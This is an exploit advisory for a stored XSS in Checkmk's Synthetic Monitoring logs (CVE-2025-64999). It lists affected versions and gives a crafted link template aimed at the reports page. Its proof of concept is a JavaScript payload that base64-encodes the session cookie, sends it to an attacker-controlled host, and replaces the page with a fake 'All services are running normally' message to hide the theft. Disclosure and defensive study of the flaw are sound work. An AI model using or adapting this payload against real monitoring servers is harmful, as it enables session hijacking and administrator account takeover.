## https://sploitus.com/exploit?id=PACKETSTORM:216391
=============================================================================================================================================
| # Title : Checkmk β€ 2.4.0p21 / β€ 2.3.0p42 Synthetic Monitoring Logs β Stored XSS |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://checkmk.com |
=============================================================================================================================================
[+] Summary : CVE-2025-64999 A vulnerability due to improper neutralization of user-controlled input affects Checkmk versions:
2.4.0 before 2.4.0p22
2.3.0 before 2.3.0p43
The issue allows an attacker who can manipulate a hostβs check output to inject malicious JavaScript into the Synthetic Monitoring HTML logs. When a victim accesses these logs β potentially via a crafted phishing link β the injected script executes in the context of the authenticated Checkmk session.
Successful exploitation may result in:
Session hijacking
Account takeover
Unauthorized actions within the Checkmk interface
Data exfiltration
The vulnerability is classified as Stored Cross-Site Scripting (Stored XSS) because the malicious payload is stored within monitoring logs and executed when viewed.
[+] POC :
Link Crafting
The attacker creates a seemingly legitimate and legitimate link to trick the system administrator into clicking it:
https://<CHKMK_URL>/<SITE>/check_mk/robotmk_suite_report.py?site=<SITE>&host=<TARGET_HOST>&service=<SERVICE_NAME>&log_type=ok
Once the administrator (with an active session) clicks the link, the "unprotected" reports page loads.
The browser reads the injected JavaScript code and executes it immediately with administrator privileges.
<script>
var xhr = new XMLHttpRequest();
var sensitiveData = btoa(document.cookie);
xhr.open("GET", "https://attacker-controlled-site.com/log?data=" + sensitiveData, true);
xhr.send();
document.body.innerHTML = "<h1>System Check: OK</h1><p>All services are running normally.</p>";
</script>
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================